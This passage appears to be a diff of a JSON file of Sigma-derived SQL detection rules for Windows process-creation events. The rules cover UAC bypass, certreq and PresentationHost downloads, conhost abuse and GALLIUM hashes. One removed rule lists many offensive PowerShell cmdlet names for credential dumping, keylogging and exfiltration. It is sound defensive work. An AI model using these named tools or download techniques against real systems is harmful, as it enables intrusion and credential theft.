- RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1127" ], "falsepositives": [ - "Legitimate use by administrators" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "title": "Conhost Parent Process Executions", + "id": "7dc2dedd-7603-461a-bc13-15803d132355", "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the conhost execution as parent process. 
Can be used to evaded defense mechanism.", + "author": "omkar72", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' 
OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' 
ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE 
'\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE 
'%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR 
ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "proc_creation_win_conhost_susp_child_process.yml" }, { - "title": "Download Arbitrary Files Via PresentationHost.exe", - "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "title": "UAC Bypass via Windows Firewall Snap-In Hijack", + "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR 
CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_presentationhost_download.yml" + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", - "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "status": "experimental", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN ('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', 
'44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Suspicious Workstation Locking via Rundll32", - "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", + "title": "Sysinternals PsService Execution", + "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", "status": "experimental", - "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", - "author": "frack113", + "description": "Detects usage of Sysinternals PsService which can be abused for service 
reconnaissance and tampering", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" + "Legitimate use of PsService by an administrator" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psservice.exe' OR (NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_user32_dll.yml" + "filename": "proc_creation_win_sysinternals_psservice.yml" }, { - "title": "Suspicious CustomShellHost Execution", - "id": "84b14121-9d14-416e-800b-f3b829c5a14d", + "title": "Windows Binary Executed From WSL", + "id": "ed825c86-c009-4014-b413-b76003e33d35", "status": "experimental", - "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "description": "Detects the execution of Windows binaries from within a WSL instance. 
This could be used to masquerade parent-child relationships", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1216" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_customshellhost.yml" + "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
